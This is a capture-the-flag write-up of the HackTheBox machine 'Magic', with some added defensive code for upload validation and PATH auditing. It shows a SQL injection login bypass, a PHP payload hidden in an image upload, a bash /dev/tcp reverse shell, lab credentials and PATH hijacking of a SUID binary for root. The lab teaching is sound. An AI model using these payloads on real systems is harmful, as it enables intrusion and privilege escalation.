MAGIC HackTheBox Walkthrough

Musyoka Ian
14 min read, Aug 22, 2020


Hello guys, the HackTheBox team has just retired Magic, which means I am allowed to release a walkthrough on it. In my opinion the box was really fun and involves a lot of OSCP techniques, which is one thing that made me like it. The second thing that made me love the box was that it wasn't too complex: every step of the way you had a clue of what to do to advance to the next stage, which made it easy to tackle. You start off with a login page, intercept the request with Burp Suite and feed it to sqlmap to check whether the login page is vulnerable to SQL injection. In the middle of the requests you see a 302 redirect, meaning something good must have happened, but if you aren't careful you might miss it. We then send the requests through Burp, find the payload that worked and use it to log in to the website. Next you find that the file upload mechanism can be bypassed, meaning you can upload a malicious PHP file and use it to get a shell on the box. Next you dump the contents of a SQL database and get additional credentials that allow you to escalate your privileges from the Apache user (www-data) to a user on the box. User part done! For root you find a binary with a PATH manipulation vulnerability and exploit it to get root on the box. It's a really fun box and I'm sure you'll like it. Without much more to say, let's jump in.

As always we'll start off with an nmap scan of the box. This gives us a good idea of the services running on the box, and if we are lucky we might find a service with a known exploit that we can use to get a shell.

Looking at the nmap results we see that there are two ports open on the box:

SSH and HTTP. Since HTTP has a bigger attack surface than SSH, that's where we'll begin. We can't start brute forcing SSH since we don't even have a valid username yet.

Opening the webpage on port 80 we get a standard webpage

Looking at the source code nothing interesting shows up

Tried to see if robots.txt existed on the web server but got nothing

I decided to leave gobuster (a tool used to brute-force URIs, including directories and files, as well as DNS subdomains) running in the background while I manually poked around the page.

Going back to the webpage we see there is a link to login. Clicking on it gets us to a login page

Sweet, there are several things we could do with a login page:

  1. Brute-force the password with common usernames like admin, root, guest etc.
  2. The login page may be vulnerable to SQL injection, which we could use to dump the database, which could contain user credentials
  3. The login page could be vulnerable to NoSQL injection, which we could use to dump user credentials from the database
  4. We could use SQL injection or NoSQL injection to bypass the login page
  5. It could just be a rabbit hole put there to slow us down and waste our time
  6. We could try default credentials like admin:admin, guest:guest, admin:password and hope we get lucky
  7. The login credentials may have been left somewhere on the box, for example in NFS shares, SMB shares or even some random web directory, and we need to find them using various methods

First I submitted default credentials but didn't get any quick wins there.

Next I intercepted the request with Burp Suite and saved it to a file.

Then I ran sqlmap against that file.

While sqlmap was running I saw something unusual:

We had been redirected to uploads.php.

This means that something good must have happened, so I decided to intercept the requests with Burp Suite and find the payload that worked.

After looking at many of the requests I found that the one that worked was the one below.

Looking at the response, it gave us a 302 redirect.

I decided to URL decode the request to see the exact payload that worked.

Looking above we get the exact payload:

admin' ORDER BY 1-- -

Sweet, let's go back to the webpage and see if it will bypass the login.

On clicking login we get logged in immediately, even without submitting a password. Sweet!

I decided to let sqlmap finish its requests to see whether it could dump the database, because we could use those credentials to log in to the box via SSH.

But looking back at sqlmap, it got nothing.

Meaning if you were waiting for a "successful injection" message you could easily have missed the redirect.

After finishing the box I went back to see if I could find any other way to bypass the login page, and remembered that the PayloadsAllTheThings GitHub repository has great wordlists for authentication bypass. I fuzzed the login page with the wordlist Auth_Bypass.txt to see which payloads would work and found a few that did, 5 to be exact.

Then I fuzzed again using Auth_Bypass2.txt and found 10 payloads that worked. Sweet, now we have 15 working payloads at our disposal.

After bypassing the login page we are greeted with an upload page.

Let's try uploading an image and see if it works.

As you see above, images are allowed. Next let's try uploading PHP files and see if we get lucky, because if we can upload a PHP file we can use it to execute system commands through PHP.

I created a simple echo command before trying to execute any system command, to check whether PHP safe mode was enabled.

I saved the file and tried uploading it to the web server but got an error saying that only images can be uploaded.

Question: how does the server determine whether a file is an image or not?

By using something called magic bytes, which are essentially a few bytes at the start of a file used to identify or verify its content and determine exactly what file type it is.

For example, if we run the file command against our PHP script we see it's just ASCII text.

Let's try manipulating our PHP file with hexeditor to make it look like an image by prepending the (hex) magic bytes of a JPEG.

Still it didn't work, but since we got a JavaScript popup I thought there was some client-side validation going on, so I decided to send a legitimate image through and intercept the request with Burp Suite.

Then I sent the request to Burp Suite and started playing with it.

First I added a PHP shell in the middle of the picture.

Next I added a .php extension to the filename.

Then I sent the request.

Looking at the response I got "file uploaded successfully".

Let's navigate to the image.

And voila, we see that it exists.

Let's try and see if we can execute code. I know it sounds odd that a .jpg extension allows PHP to be executed, but I think the web server just checks whether there is a php extension anywhere in the filename and, if there is, executes the PHP code within the file.

And voila, we have code execution through file upload.
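As an added illustration (my own code, not the box's upload handler or anything from the original post), here is the weak magic-byte-only check described above next to a hardened validator that also enforces a single allow-listed extension and rejects bodies carrying a PHP open tag; the sample upload is constructed inline.

```python
import re
from typing import Tuple

# Magic bytes the weak check trusts (JPEG SOI marker and PNG signature).
JPEG_MAGIC = b"\xff\xd8\xff"
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
ALLOWED_EXT = {"jpg", "jpeg", "png"}
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)


def weak_is_image(data: bytes) -> bool:
    """The check the box relied on: only the leading magic bytes are inspected,
    so a PHP file with a JPEG header glued in front of it passes."""
    return data.startswith(JPEG_MAGIC) or data.startswith(PNG_MAGIC)


def hardened_is_image(filename: str, data: bytes) -> Tuple[bool, str]:
    """Magic bytes AND exactly one allow-listed extension AND no PHP open tag.
    Returns (accepted, reason)."""
    if not weak_is_image(data):
        return False, "bad magic bytes"
    parts = filename.lower().split(".")
    # "photo.php.jpg" splits into three parts: reject double extensions outright,
    # since a server matching ".php" anywhere in the name would execute the file.
    if len(parts) != 2 or not parts[0]:
        return False, "multiple or missing extensions"
    if parts[1] not in ALLOWED_EXT:
        return False, "extension not allowed"
    if PHP_TAG.search(data):
        return False, "embedded PHP tag"
    return True, "ok"


# Constructed samples: a JPEG header with PHP hidden after it (the bypass above)
# and a plain JPEG-looking blob with no code in it.
DISGUISED_PHP = JPEG_MAGIC + b"\x00" * 16 + b"<?php echo 'hi'; ?>"
REAL_JPEG = JPEG_MAGIC + b"\xe0\x00\x10JFIF" + b"\x00" * 16

if __name__ == "__main__":
    print(weak_is_image(DISGUISED_PHP))                       # True: magic bytes alone are fooled
    print(hardened_is_image("photo.php.jpg", DISGUISED_PHP))  # (False, 'multiple or missing extensions')
    print(hardened_is_image("photo.jpg", DISGUISED_PHP))      # (False, 'embedded PHP tag')
    print(hardened_is_image("photo.jpg", REAL_JPEG))          # (True, 'ok')
```

Even with this check in place, uploads should be stored outside the web root under a server-generated name, and the web server should only execute files whose final extension is .php.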

Next we need to get a shell, so I intercepted the request with Burp Suite and made sure it was working correctly.

As you see below we have code execution. The cheat sheet that I normally use for reverse shells is

Pentest Monkey's reverse shell cheat sheet

The payload that I used is

bash -c 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1'

The reason I added bash -c was to ensure that we are in a bash context, since that specific reverse shell is bash specific.

Next I URL encoded the payload using Ctrl + U.

Then I set up a netcat listener on my local box on the port I had specified in the reverse shell payload.

Then I executed the payload using Burp Suite.

Going back to my netcat listener we had a shell on the box. Sweet!

Wow, cool, now we are in the box. Next it's time to upgrade the shell to a fully functional one.

Next I decided to look at the PHP files; sometimes you get lucky and find credentials that allow you to escalate your privileges.

Looking at db.php5 we get credentials for a user called theseus:

theseus:iamkingtheseus

Looking at /etc/passwd we see that he's a user on the box.

Let's try and see if there's credential reuse going on.

But we got an authentication failure as you see above.

Next I decided to run LinPEAS but didn't get anything really useful.

Then I remembered from the LinPEAS output that MySQL was running.

I tried logging into MySQL but the mysql client binary was not available.

This is where things got a bit weird and I was stuck for a while, but then I remembered that we don't actually have to log in to the database: we can just dump its contents using mysqldump.

After I typed the password that we retrieved from the PHP file I got all the contents of the database.

I looked through the contents of the database and found additional credentials:

admin:Th3s3usW4sK1ng

I decided to try that password for the user theseus and got a successful login.

Sweet, now we can read the user flag.

Next we have to escalate our privileges to the root user. I ran LinPEAS again and it found a custom binary with the SUID bit set that was owned by root. Since it has the SUID bit set we can execute the binary as the root user even though we are not root.

That was definitely interesting.

I decided to run the application and found that it does some kind of system checks.

I copied the binary to my local box and examined it with ltrace.

Looking at the output we see that it executes system commands without specifying the full path; it just uses the bare command name (a relative path).

This is where the vulnerability comes into play. It is called PATH variable manipulation (PATH hijacking). It is an old OSCP technique but still works on modern operating systems.

I talked about it in my previous article on Wonderland: when a program that runs from a terminal calls other programs or binaries without specifying their full path, an attacker can hijack the PATH and cause the program to execute a dummy application with the same name as the real one.

PATH on any Linux system is how the OS knows where to look for executable binaries. As you see in the output below, those are the specific locations where binaries are stored, including the programs that our application sysinfo calls.

For example, the lshw application.

When we execute lshw in the terminal, the shell looks through all those locations in order to find where lshw is stored.

Using the which command we see that the lshw binary is in

/usr/bin

But the developer of sysinfo didn't specify a full path, as you see below.

Meaning if we can hijack the PATH we can cause the program to execute our own script instead of the intended binary. As I've said, we need to modify the PATH, and that is as simple as the one-liner below:

export PATH=/tmp:$PATH

After running that command, the /tmp directory has been added to the front of our PATH,

as we can see when we look at the PATH again.

Meaning if we place a dummy script named lshw in /tmp it will get executed instead of the real lshw binary.
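As an added example (my own code, not the sysinfo binary or anything from the box), the PATH lookup described above reproduced in Python, a PATH audit that flags the entries an unprivileged user could write to, and the fix a SUID program should apply: resolving helpers against a fixed trusted PATH and calling them by absolute path. The scratch layout with harmless placeholder lshw scripts is constructed by demo_layout(), and SAFE_PATH is an assumed default.

```python
import os
import stat
import tempfile

# Fixed PATH a privileged program should use for helpers (assumed safe default, not sysinfo's).
SAFE_PATH = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"

def resolve_command(name, path_env):
    """Mimic the lookup sysinfo triggers: the first PATH entry holding an
    executable called `name` wins, which is why /tmp in front of PATH matters."""
    for entry in path_env.split(":"):
        candidate = os.path.join(entry or ".", name)  # empty entry means cwd
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate
    return None

def audit_path(path_env):
    """Flag PATH entries an unprivileged user could plant a fake binary in."""
    findings = []
    for entry in path_env.split(":"):
        if not entry.startswith("/"):
            findings.append((entry or "(empty)", "relative entry"))
        elif os.path.isdir(entry) and os.stat(entry).st_mode & stat.S_IWOTH:
            findings.append((entry, "world-writable"))
    return findings

def safe_helper_argv(name, path_env=SAFE_PATH):
    """What sysinfo should have done: resolve helpers against a fixed trusted
    PATH and call them by absolute path, ignoring the caller's environment."""
    resolved = resolve_command(name, path_env)
    if resolved is None:
        raise FileNotFoundError(f"{name} not found under trusted PATH")
    return [resolved]

def demo_layout():
    """Constructed scratch layout: a trusted bin dir and a world-writable tmp dir,
    each holding a harmless placeholder script named lshw."""
    root = tempfile.mkdtemp()
    trusted, writable = os.path.join(root, "bin"), os.path.join(root, "tmp")
    for directory, mode in ((trusted, 0o755), (writable, 0o1777)):
        os.mkdir(directory)
        script = os.path.join(directory, "lshw")
        with open(script, "w") as f:
            f.write("#!/bin/sh\necho placeholder\n")
        os.chmod(script, 0o755)
        os.chmod(directory, mode)
    return trusted, writable
```

Calling resolve_command("lshw", writable + ":" + trusted) on the demo layout returns the copy in the writable directory, and audit_path() on the same string flags exactly that entry.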

I created a dummy script which, if executed, will ping our box. On my box I set up a tcpdump listener.

Then I executed sysinfo again and voila, we got a ping on our local box.

We've successfully hijacked the PATH; now we can use this to our advantage and get a root shell on the box.

This time I told the script to execute a bash reverse shell to our IP address, which in turn will give us a root shell on the box.

Then I started a netcat listener back on my local box.

Saved the script and then executed sysinfo again.

And voila, we have a root shell on the box.

Sweet, we are now root on the box.

We can submit the root flag and get our points.

And the box is pretty much done. Easy, right? And you get 30 points from the box!

Now let's go back and get a shell as the Apache user (www-data).

First, set up a netcat listener.

Second, send the payload and get a shell.

We already know the password for the user theseus:

theseus:Th3s3usW4sK1ng

Let's try to escalate our privileges to that user.

Looking at the output we get an error:

su: must be run from a terminal

OK, no worries, let's try logging in via SSH.

Looking below we get another error: we can only log in using a public key. We've hit a dead end. Why is this so?

Because we didn't upgrade our shell like we did the first time. I saw people actually getting stuck at this point in the HackTheBox forum, asking for hints.

That's why I always upgrade my shell once I get one, to avoid such problems; it also makes my work easier since I get tab auto-completion and so on.

Let's try upgrading our shell again and run the same command:

1. python3 -c 'import pty;pty.spawn("/bin/bash")'
   OR
   python -c 'import pty;pty.spawn("/bin/bash")'
2. Ctrl + Z (background the session)
3. stty raw -echo;fg
   (press enter twice)
4. export TERM=screen (enables clearing the screen)

Then let's try logging in as theseus again.

And voila, it works!

The message I was driving home is: always upgrade your shell after you get one; it saves you from a lot of problems.

Hope you guys enjoyed the walkthrough. If so, please clap for me down below and also follow me so that you won't miss any upcoming walkthroughs.

But that's it for now guys, till next time, goodbye.
